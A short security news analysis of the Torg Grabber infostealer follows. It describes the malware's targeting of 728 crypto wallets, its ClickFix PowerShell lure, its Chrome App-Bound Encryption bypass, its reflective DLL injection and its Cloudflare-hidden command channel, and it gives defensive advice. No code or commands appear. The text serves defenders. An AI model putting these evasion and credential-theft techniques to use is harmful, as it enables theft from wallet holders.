New Torg Grabber Infostealer Malware Targets 728 Crypto Wallets

The emergence of Torg Grabber underscores a broader shift in cybercrime toward high‑value, niche targets such as cryptocurrency wallets. While traditional ransomware still dominates headlines, attackers are now weaponizing infostealers that silently siphon private keys, seed phrases, and authentication tokens directly from the browsers users trust for daily transactions. This trend reflects the growing financial incentive of crypto theft, where a single compromised wallet can contain assets worth millions, prompting threat actors to refine their tools for maximum yield.

Technically, Torg Grabber showcases a layered evolution in malware delivery and persistence. Initial versions relied on Telegram‑based C2 channels, but the latest builds have migrated to encrypted HTTPS traffic behind Cloudflare, obscuring traffic patterns and complicating network‑based detection. The ClickFix clipboard hijack method tricks users into running PowerShell commands, a technique that bypasses many endpoint controls. Moreover, the inclusion of App‑Bound Encryption bypasses Chrome’s cookie protection, while reflective DLL injection via the Underground tool extracts master encryption keys, allowing the malware to decrypt stored credentials in memory. These capabilities, combined with multi‑layered obfuscation and in‑memory execution, make static analysis difficult and demand advanced behavioral monitoring.

For organizations, the implications are twofold: first, the need to secure browser extensions and enforce strict policies around crypto‑related add‑ons; second, the importance of augmenting endpoint detection and response (EDR) solutions with real‑time clipboard monitoring and PowerShell command‑line auditing. Regularly updating browser security settings, employing hardware‑based MFA, and segmenting networks to isolate high‑risk workstations can reduce exposure. As Torg Grabber continues to add C2 domains weekly, staying ahead of its development cycle will require continuous threat‑intel feeds and proactive hunting for the specific indicators of compromise it generates.